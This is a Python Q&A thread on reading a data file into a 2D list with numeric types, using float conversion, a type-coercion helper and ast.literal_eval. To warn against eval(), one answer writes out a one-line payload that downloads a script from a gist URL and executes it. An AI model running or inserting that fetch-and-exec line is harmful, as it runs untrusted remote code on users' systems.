How do I parse a file into a 2d array while supporting data types in Python?
I am new to programming. I want to read a data file and store it as a 2d array in python3 so that I can work with individual items. I am using the following method to read in a file:
with open("text.txt", "r") as text:
lines = [line.split() for line in text]
It, however, parses everything as text. How can I read in a file while saving data types (parsing text as text, ints as int and float as float, etc.)? The input file looks like this:
HNUS 4973168.840 1734085.512 -3585434.051
PRET 5064032.237 2724721.031 -2752950.762
RBAY 4739765.776 2970758.460 -3054077.535
TDOU 5064840.815 2969624.535 -2485109.939
ULDI 4796680.897 2930311.589 -3005435.714
Usually, you should expect a specific type of data for rows, columns, or specific cells. In your case, it will be a string in every first cell of the row and numbers following in all other cells.
data = []
with open('text.txt', 'r') as fp:
for line in (l.split() for l in fp):
line[1:] = [float(x) for x in line[1:]]
data.append(line)
If you really want to convert every cell to the closest applicable data type, you can use a function like this and apply it to every cell in a 2D list.
def nearest_applicable_conversion(x):
try:
return int(x)
except ValueError:
pass
try:
return float(x)
except ValueError:
pass
return x
I am greatly discouraged to use eval()
as it will evaluate any valid Python code and makes your system vulnerable to attacks by those who know how. I could easily execute arbitrary code by putting the following code in one of the cells that you are eval()
from text.txt
, I just have to make sure it doesn't contain spaces as it will make the code split into multiple cells:
(lambda:(eval(compile(__import__('urllib.request').request.urlopen('https://gist.githubusercontent.com/NiklasRosenstein/470377b7ceef98ef6b87/raw/06593a30d5b00ca506b536315ac79f7b950a5163/jagged.py').read().decode(),'<string>','exec'),globals())))()
source to share
Is this what you want
import ast
with open("1.txt","r") as inp:
c= [a if a.isalpha() else ast.literal_eval(a.strip()) for line in inp for a in line.split() ]
output:
print c
['HNUS', 4973168.84, 1734085.512, -3585434.051, 'PRET', 5064032.237, 2724721.031, -2752950.762, 'RBAY', 4739765.776, 2970758.46, -3054077.535, 'TDOU', 5064840.815, 2969624.535, -2485109.939, 'ULDI', 4796680.897, 2930311.589, -3005435.714]
print c[1],type(c[1])
4973168.84 <type 'float'>
you cannot directly apply as.literal_eval()
to string arguments. Since it strips the quotes of the arguments
those.)
ast.literal_eval("as")
File "<unknown>", line 1
as
^
SyntaxError: unexpected EOF while parsing
ast.literal_eval('"as"')
'as'
Edit:
To get it as a 2-dimensional array:
import ast
with open("1.txt","r") as inp:
c= [[a if a.isalpha() else ast.literal_eval(a.strip()) for a in line.split() ] for line in inp ]
output:
print c
[['HNUS', 4973168.84, 1734085.512, -3585434.051], ['PRET', 5064032.237, 2724721.031, -2752950.762], ['RBAY', 4739765.776, 2970758.46, -3054077.535], ['TDOU', 5064840.815, 2969624.535, -2485109.939], ['ULDI', 4796680.897, 2930311.589, -3005435.714]]
source to share